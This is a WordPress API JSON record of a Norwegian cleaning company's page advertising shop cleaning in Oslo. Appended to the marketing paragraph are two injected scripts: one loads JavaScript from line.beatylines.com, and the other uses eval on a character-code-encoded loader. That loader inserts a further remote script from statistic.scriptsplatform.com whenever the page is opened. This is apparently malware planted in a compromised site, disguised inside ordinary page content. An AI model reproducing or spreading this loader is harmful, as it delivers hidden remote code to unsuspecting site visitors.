{"id":5340,"date":"2021-03-28T04:20:12","date_gmt":"2021-03-28T03:20:12","guid":{"rendered":"http:\/\/ms24.no\/?page_id=5340"},"modified":"2021-03-28T04:28:15","modified_gmt":"2021-03-28T03:28:15","slug":"renhold-butikk","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=5340","title":{"rendered":"Renhold Butikk"},"content":{"rendered":"<h2>\n\t\t\t\t\t\t\u00d8k trivsel for b\u00e5de kunder og ansatte med regelmessig rengj\u00f8ring\t\t\t\t\t<\/h2>\n<p>\t\t\t\t\t\tVi vet at \u00e5 holde en butikk ren for st\u00f8v og diverse grums som blir dratt med inn fra ute, er ytterst viktig for \u00e5 ivareta butikkens bilde. Ved jevnlig renhold vil en kunne minke slitasje og skape en hyggeligere atmosf\u00e6re for b\u00e5de de ansatte og for kunden. Dessuten gir renhold butikk Oslo en helsefremmende effekt.<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00d8k trivsel for b\u00e5de kunder og ansatte med regelmessig rengj\u00f8ring Vi vet at \u00e5 holde en butikk ren for st\u00f8v og diverse grums som blir dratt med inn fra ute, er ytterst viktig for \u00e5 ivareta butikkens bilde. Ved jevnlig renhold vil en kunne minke slitasje og skape en hyggeligere atmosf\u00e6re for b\u00e5de de ansatte [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-5340","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5340","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5340"}],"version-history":[{"count":4,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5340\/revisions"}],"predecessor-version":[{"id":5571,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5340\/revisions\/5571"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5340"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}